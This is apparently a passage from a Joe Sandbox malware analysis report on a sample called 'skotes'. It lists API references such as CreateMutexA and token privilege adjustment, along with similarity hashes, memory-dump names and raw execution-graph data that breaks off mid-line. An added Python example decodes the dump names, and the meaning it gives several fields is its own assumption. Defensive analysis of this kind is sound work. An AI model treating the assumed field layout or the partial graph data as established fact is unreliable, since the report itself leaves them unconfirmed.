                                                                                                                                                                                                                                control_flow_graph 283 6fa34f-6fa35b 284 6fa35d-6fa36b 283->284 285 6fa371-6fa39a call 70d663 283->285 284->285 286 6fa93a 284->286 291 6fa39c-6fa3a8 285->291 292 6fa3c8-6fa916 call 7080c0 285->292 289 6fa953-6fa994 Sleep CreateMutexA 286->289 290 6fa93a call 726c6a 286->290 297 6fa9a7-6fa9a8 289->297 298 6fa996-6fa998 289->298 290->289 294 6fa3be-6fa3c5 call 70d663 291->294 295 6fa3aa-6fa3b8 291->295 294->292 295->286 295->294 298->297 301 6fa99a-6fa9a5 298->301 301->297
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
Yara matches
Similarity
• API ID: CreateMutexSleep
• String ID: T2u
• API String ID: 1464230837-1508609724
• Opcode ID: e5079d7c613b67464bcc27c298592fe86cd2e21189ee70ea6ca9f8cb571b81fb
• Instruction ID: 6ef2dc1be26bfc8654643066fa6961dacf9a5958da9f974019be64033bba4e8a
• Opcode Fuzzy Hash: e5079d7c613b67464bcc27c298592fe86cd2e21189ee70ea6ca9f8cb571b81fb
• Instruction Fuzzy Hash: BD216D72614208DBE7189BACDC857BDB763DBD1311F20426AE51CD77D1C7B955808212
APIs
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 57040152-0
                                                                                                                                                                                                                                • Opcode ID: fe184e1e0fa161fd8bf378bd8a90adcdee3697bbe3dc6b46507b8599baacbe8d
                                                                                                                                                                                                                                • Instruction ID: 04beb1361d97f4a1eea4cd507f6664afb484d088f6411734ee1176e452d2434b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe184e1e0fa161fd8bf378bd8a90adcdee3697bbe3dc6b46507b8599baacbe8d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36A1E1B0A01219DFDB21DF64C949BAAB7E9FF15310F04822AE915D7381EB35EA04CBD1
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
• Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
Yara matches
Similarity
• API ID: _strrchr
• String ID: vr
• API String ID: 3213747228-593451772
• Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
• Instruction ID: ec6946a4f279d32ab9b1418d1339c85dbdbce4d81a052413d243b3f3224677d9
• Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
• Instruction Fuzzy Hash: 5AB16A32E002A59FDB16CF28D8817BEBBE5EF65350F15416AE845EB242D63C9E41CB60
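The dump names listed under Memory Dump Source encode where each region of the 006F0000 module was captured, and a reader who wants to see the module's layout (rather than fifty file names) has to decode them. The following Python is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it parses a subset of the .sdmp names copied from the listing above and summarises the regions by address and page protection. The report itself only states that the fourth field is the region's address (Offset: 006F0000); treating the fifth field as a Windows page-protection value and the seventh as the allocation type is an assumption made for this example. The protection constants themselves are the standard winnt.h values.

```python
import re
from collections import Counter

# Standard Windows page-protection and allocation-type constants (winnt.h).
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_IMAGE = 0x1000000

PROTECT_NAMES = {
    0x02: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}

# ASSUMED layout of an .sdmp name: pid.phase.seq.address.protect.f5.memtype.f7.sdmp
# Only the address field is confirmed by the report; the other names are this
# example's interpretation and may not match Joe Sandbox's own meaning.
DUMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<addr>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f5>[0-9A-Fa-f]{8})\."
    r"(?P<memtype>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.sdmp$"
)

# Subset of the dump names copied from the report's listing for the 006F0000 module.
SAMPLE_DUMPS = [
    "00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmp",
    "00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp",
    "00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmp",
    "00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmp",
    "00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmp",
    "00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmp",
    "00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmp",
    "00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmp",
    "00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmp",
    "00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmp",
]


def parse_dump_name(name):
    """Split one .sdmp name into its fields (field meanings are assumptions, see above)."""
    m = DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised dump name: {name!r}")
    protect = int(m["protect"], 16)
    return {
        "pid": int(m["pid"], 16),
        "phase": int(m["phase"], 16),
        "seq": int(m["seq"]),
        "addr": int(m["addr"], 16),
        "protect": protect,
        "protect_name": PROTECT_NAMES.get(protect, f"0x{protect:x}"),
        "is_image": int(m["memtype"], 16) == MEM_IMAGE,
        # Writable + executable pages are what an unpacker needs to rewrite code in place.
        "exec_write": protect in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY),
    }


def memory_map(names):
    """Return the regions sorted by address, one dict per dump."""
    return sorted((parse_dump_name(n) for n in names), key=lambda r: r["addr"])


def summarize(names, base):
    """Summarise a module's dumps: extent, protection mix, and how many pages are W+X."""
    regions = memory_map(names)
    return {
        "count": len(regions),
        "lowest": regions[0]["addr"],
        "highest": regions[-1]["addr"],
        "span_kb": (regions[-1]["addr"] - base) // 1024,
        "by_protect": dict(Counter(r["protect_name"] for r in regions)),
        "exec_write_count": sum(r["exec_write"] for r in regions),
        "all_image": all(r["is_image"] for r in regions),
        "pids": sorted({r["pid"] for r in regions}),
    }


if __name__ == "__main__":
    for r in memory_map(SAMPLE_DUMPS):
        print(f"{r['addr']:#010x}  {r['protect_name']:<24}  W+X={r['exec_write']}")
    print(summarize(SAMPLE_DUMPS, base=0x6F0000))
```

Run against the full listing, the summary shows whether the module's pages were captured read/write only at the headers and executable-writable elsewhere, which is the pattern one checks for when a report flags section-right changes; the parse deliberately raises on any name that does not fit the assumed eight-field shape rather than guessing.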
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
Yara matches
Similarity
• API ID: Xtime_diff_to_millis2_xtime_get
• String ID:
• API String ID: 531285432-0
• Opcode ID: b7a6bfb85b665cc8448c73e8d5cdb19c38b1730bd25bf7fe07767e87c2412220
• Instruction ID: b44687d64c86284783a1a60ac568a7424e962ac33f232c447e540e2664b52822
• Opcode Fuzzy Hash: b7a6bfb85b665cc8448c73e8d5cdb19c38b1730bd25bf7fe07767e87c2412220
• Instruction Fuzzy Hash: D4215176A00109EFDF01EFA4CC859BEB7B9EF08710F104215FA01B7291DB79AD019BA1
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                • String ID: 8"u$`'u
                                                                                                                                                                                                                                • API String ID: 3903695350-3768269654
                                                                                                                                                                                                                                • Opcode ID: a728fbcee930a6093c5a1e3f1a5ef264f70c58a9b719d07db11431c58a576402
                                                                                                                                                                                                                                • Instruction ID: dff95fd5037bdfc617dd0bc00d83298702648b639292c33927ca7c4e87ce8d8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a728fbcee930a6093c5a1e3f1a5ef264f70c58a9b719d07db11431c58a576402
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6312A31600662EFEB31AA39E849B5B77F8EF00352F14443AE455D759ADEB9EC808B11

Execution Graph

Execution Coverage:9.1%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:1.7%
Total number of Nodes:1953
Total number of Limit Nodes:38
execution_graph: raw node and edge data of the interactive graph viewer not reproduced here. API calls labelled on the graphed nodes: token and privilege manipulation (GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges); dynamic import resolution (GetModuleHandleW, GetProcAddress); memory management (VirtualAlloc, VirtualFree, malloc, free, memmove); file I/O (CreateFileW, ReadFile, WriteFile, SetFilePointer, SetEndOfFile, SetFileTime, SetFileSecurityW, GetCurrentDirectoryW, CloseHandle); process control (SetProcessAffinityMask); string and COM handling (wcscmp, CharUpperW, VariantClear, SysStringLen); CRT and error handling (_isatty, _CxxThrowException, GetLastError).
27255->27164 27256 1e5aa5 27256->27212 27266 1e5aae 27256->27266 27258->27268 27281 1e619c 27258->27281 27282 1e618a 27258->27282 27260 1e62d2 27595 1e211c 13 API calls 27260->27595 27571 1e211c 13 API calls 27261->27571 27262 1e5859 27271 1e590d 27262->27271 27272 1e5862 27262->27272 27263->27105 27264->27198 27583 1da8a0 24 API calls 27265->27583 27578 1d6d48 47 API calls 27266->27578 27267 1e57a5 27279 1e57ab free free free 27267->27279 27280 1e57e7 free free free 27267->27280 27268->27204 27268->27307 27568 1d6a04 41 API calls 27271->27568 27567 1e2094 7 API calls 27272->27567 27287 1d3208 2 API calls 27273->27287 27289 1d3404 4 API calls 27274->27289 27275 1e559e 27290 1e55ed 27275->27290 27291 1e55a5 free free free free 27275->27291 27278 1e6484 27294 1e64ee 27278->27294 27320 1d3314 3 API calls 27278->27320 27279->27105 27280->27105 27593 1d6b2c 41 API calls 27281->27593 27295 1d3404 4 API calls 27282->27295 27283 1e62e6 27296 1e62ec free free 27283->27296 27297 1e632a free free 27283->27297 27285 1e5a1d 27299 1e5a5f free free free 27285->27299 27300 1e5a23 free free free 27285->27300 27302 1e5bcb 27287->27302 27304 1e5d43 27289->27304 27306 1e5765 free 27290->27306 27318 1e56b4 27290->27318 27331 1e560c 27290->27331 27332 1e5714 free free free free 27290->27332 27291->27105 27292 1e5ab8 27292->27212 27305 1e5ac1 GetLastError 27292->27305 27293 1e5d61 27293->27304 27584 1e2094 7 API calls 27293->27584 27294->27307 27334 1e6518 free free 27294->27334 27295->27268 27296->27105 27297->27105 27298 1e61aa 27309 1e61af 27298->27309 27310 1e6228 27298->27310 27299->27105 27300->27105 27301 1e5876 27311 1e587c free free free free 27301->27311 27312 1e58c3 free free free free 27301->27312 27313 1d7ebc 90 API calls 27302->27313 27303 1e591c 27315 1e59d5 free 27303->27315 27316 1e5925 27303->27316 27322 1e6055 free 27304->27322 27326 1e5e66 27304->27326 27327 1e5de2 27304->27327 27305->27212 27317 1e5ad0 27305->27317 27306->27207 27307->27105 27594 1e2204 7 API calls 
27309->27594 27310->27268 27311->27105 27312->27105 27329 1e5bde 27313->27329 27315->27212 27569 1e2204 7 API calls 27316->27569 27579 1e211c 13 API calls 27317->27579 27318->27306 27333 1e64a6 27320->27333 27321 1e6368 27321->27278 27325 1d8c98 3 API calls 27321->27325 27322->27264 27324 1e5d7d 27324->27304 27336 1e5d84 free free free free 27324->27336 27337 1e63b0 27325->27337 27326->27322 27587 1d94a4 malloc _CxxThrowException free memset 27326->27587 27585 1d6b2c 41 API calls 27327->27585 27340 1e5bfd free free 27329->27340 27523 1d68a0 27329->27523 27342 1e5614 27331->27342 27343 1e56c3 free free free free 27331->27343 27332->27105 27598 1e3210 6 API calls 27333->27598 27334->27105 27335 1e5ae4 27346 1e5aea free free free 27335->27346 27347 1e5b26 free free free 27335->27347 27336->27105 27348 1e6415 27337->27348 27596 1e211c 13 API calls 27337->27596 27339 1e61c6 27350 1e61cc free free 27339->27350 27351 1e61fa free free 27339->27351 27340->27212 27341 1e593e 27353 1e598b free free free free 27341->27353 27354 1e5944 free free free free 27341->27354 27342->27318 27355 1e561c 27342->27355 27343->27105 27357 1e597b 27346->27357 27347->27357 27537 1d8adc 27348->27537 27349 1e5df1 27349->27322 27586 1e2204 7 API calls 27349->27586 27350->27357 27351->27357 27353->27357 27354->27357 27362 1e566a free free free free 27355->27362 27363 1e5620 free free free free 27355->27363 27356 1e64bf 27364 1e64e4 free 27356->27364 27370 1d3404 4 API calls 27356->27370 27357->27105 27360 1e5e92 27368 1e604a free 27360->27368 27373 1d3208 2 API calls 27360->27373 27362->27105 27363->27105 27364->27294 27365 1e63cf 27365->27348 27371 1e63d6 free free 27365->27371 27368->27322 27374 1e64e3 27370->27374 27371->27105 27372 1e5e13 27372->27322 27376 1e5e1e free free free free 27372->27376 27378 1e5eb6 27373->27378 27374->27364 27376->27357 27380 1d3208 2 API calls 27378->27380 27379 1e643e 27379->27278 27381 1e6445 free free 27379->27381 27382 1e5ec4 27380->27382 27381->27105 27588 
1d92d4 malloc _CxxThrowException _CxxThrowException free 27382->27588 27385 1e5eeb 27386 1e5ef4 27385->27386 27387 1e5f83 27385->27387 27589 1e2094 7 API calls 27386->27589 27590 1d9828 130 API calls 27387->27590 27390 1e5f0a 27392 1e602f free free 27390->27392 27393 1e5f15 7 API calls 27390->27393 27391 1e5f9d 27391->27392 27591 1e211c 13 API calls 27391->27591 27392->27368 27393->27105 27395 1e5fba 27395->27392 27396 1e5fc1 7 API calls 27395->27396 27396->27105 27398 1fed02 27397->27398 27399 1fecd3 27397->27399 27400 1fb204 VariantClear 27398->27400 27399->27398 27402 1feceb free free 27399->27402 27401 1fed27 27400->27401 27403 1e4540 27401->27403 27599 1fdfa4 14 API calls 27401->27599 27402->27399 27403->27023 27403->27024 27403->27105 27405 1fed47 27405->27403 27406 1d3404 4 API calls 27405->27406 27407 1fed5b 27406->27407 27408 1fb204 VariantClear 27407->27408 27418 1fed7b 27407->27418 27408->27418 27409 1fef2c 27602 1fe954 19 API calls 27409->27602 27410 1feff6 27603 1d4d78 10 API calls 27410->27603 27411 1feebc 27414 1d339c 4 API calls 27411->27414 27415 1feefa 27411->27415 27414->27415 27415->27409 27415->27410 27416 1fee32 27421 1fee55 27416->27421 27430 1fee0f 27416->27430 27601 1fdfa4 14 API calls 27416->27601 27417 1dae2c VariantClear 27417->27403 27418->27403 27418->27411 27418->27416 27418->27430 27600 1d34c0 malloc _CxxThrowException SysStringLen free 27418->27600 27419 1fef3e 27419->27403 27422 1d339c 4 API calls 27419->27422 27423 1fef8f 27419->27423 27425 1dae2c VariantClear 27421->27425 27422->27423 27423->27403 27426 1fefe0 free free 27423->27426 27425->27411 27426->27403 27427 1fee7a 27428 1fb204 VariantClear 27427->27428 27427->27430 27429 1fee9b 27428->27429 27429->27421 27429->27430 27430->27417 27432 1fb234 27431->27432 27433 1dae2c VariantClear 27432->27433 27434 1e49de 27433->27434 27434->27060 27434->27105 27436 1e2023 27435->27436 27437 1dae2c VariantClear 27436->27437 27438 1e206a 27437->27438 27438->27105 27438->27121 27440 1d3208 2 
API calls 27439->27440 27442 1f63f5 27440->27442 27441 1e50fa 27441->27133 27441->27135 27441->27143 27442->27441 27443 1d362c 6 API calls 27442->27443 27443->27442 27445 1d7edf 27444->27445 27446 1d7ee9 27445->27446 27448 1d7fca 27445->27448 27447 1d339c 4 API calls 27446->27447 27450 1d7f14 27447->27450 27451 1d3274 3 API calls 27448->27451 27452 1d8253 27448->27452 27449 1d7f8c 27455 1d91dc 51 API calls 27449->27455 27450->27449 27453 1d7f2e 27450->27453 27454 1d7ff9 27451->27454 27459 1d8306 27452->27459 27461 1d8296 27452->27461 27621 1dabb0 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 27453->27621 27457 1d3274 3 API calls 27454->27457 27458 1d7fa2 27455->27458 27472 1d8007 27457->27472 27466 1d89d8 CloseHandle 27458->27466 27463 1d831e 27459->27463 27467 1d8326 27459->27467 27482 1d8377 27459->27482 27460 1d7f75 27460->27449 27462 1d7f79 27460->27462 27626 1d7d4c 27461->27626 27465 1d7fc3 27462->27465 27469 1d7d4c 39 API calls 27463->27469 27465->27196 27465->27213 27466->27465 27478 1d82e7 27467->27478 27604 1d7978 27467->27604 27469->27467 27476 1d8051 27472->27476 27622 1d3670 malloc _CxxThrowException memmove free _CxxThrowException 27472->27622 27473 1d82b8 27474 1d339c 4 API calls 27473->27474 27474->27478 27477 1d80b1 27476->27477 27479 1d8075 27476->27479 27480 1d7ebc 72 API calls 27477->27480 27618 1d794c 27478->27618 27481 1d80af 27479->27481 27484 1d3404 4 API calls 27479->27484 27483 1d80b9 27480->27483 27487 1d3314 3 API calls 27481->27487 27482->27467 27485 1d3274 3 API calls 27482->27485 27483->27481 27486 1d823e free free 27483->27486 27484->27481 27492 1d83b9 27485->27492 27486->27452 27488 1d80e3 27487->27488 27489 1d3208 2 API calls 27488->27489 27490 1d80ee 27489->27490 27623 1d7ce0 44 API calls 27490->27623 27493 1d7978 39 API calls 27492->27493 27494 1d8435 27493->27494 27496 1d8439 wcscmp 27494->27496 27498 1d847c 27494->27498 27495 1d815a free free 27500 1d794c FindClose 27495->27500 27496->27498 27499 1d8459 27496->27499 27497 
1d818a SetLastError free free 27504 1d794c FindClose 27497->27504 27501 1d7d4c 39 API calls 27498->27501 27506 1d339c 4 API calls 27499->27506 27502 1d8179 free 27500->27502 27503 1d848c 27501->27503 27507 1d822d free 27502->27507 27508 1d84b3 27503->27508 27511 1d84a7 free 27503->27511 27509 1d81b5 free 27504->27509 27510 1d846b free 27506->27510 27507->27465 27512 1d339c 4 API calls 27508->27512 27509->27507 27510->27478 27511->27467 27515 1d84e4 free 27512->27515 27513 1d812a free 27516 1d3208 2 API calls 27513->27516 27514 1d81c3 27517 1d362c 6 API calls 27514->27517 27515->27478 27518 1d8106 27516->27518 27519 1d81ee free free 27517->27519 27518->27495 27518->27497 27518->27513 27518->27514 27624 1d2748 CharUpperW CharUpperW 27518->27624 27625 1d7ce0 44 API calls 27518->27625 27521 1d794c FindClose 27519->27521 27522 1d821e free 27521->27522 27522->27507 27524 1d68bb 27523->27524 27525 1d68d5 27524->27525 27526 1d68c2 SetFileAttributesW 27524->27526 27527 1d68d1 27525->27527 27528 1d3208 2 API calls 27525->27528 27526->27525 27526->27527 27527->27340 27529 1d68e3 27528->27529 27530 1da7ec 35 API calls 27529->27530 27531 1d68f8 27530->27531 27532 1d691c free 27531->27532 27533 1d68fc SetFileAttributesW free 27531->27533 27532->27527 27533->27527 27535 1d8cdc 39 API calls 27534->27535 27536 1d9242 27535->27536 27536->27260 27536->27321 27538 1d8a60 2 API calls 27537->27538 27539 1d8aef 27538->27539 27539->27278 27597 1e211c 13 API calls 27539->27597 27542->27083 27543->27094 27544->27068 27545->27068 27546->27074 27547->27074 27548->27067 27549->27071 27550->27080 27551->27103 27552->27080 27553->27128 27554->27137 27555->27151 27556->27155 27557->27152 27558->27234 27559->27178 27560->27233 27637 1d312c 27561->27637 27563 1d31b4 free 27563->27275 27564->27235 27565->27267 27566->27262 27567->27301 27568->27303 27569->27341 27570->27250 27571->27285 27573 1d3208 2 API calls 27572->27573 27574 1d8683 27573->27574 27575 1d7ebc 90 API calls 27574->27575 27576 
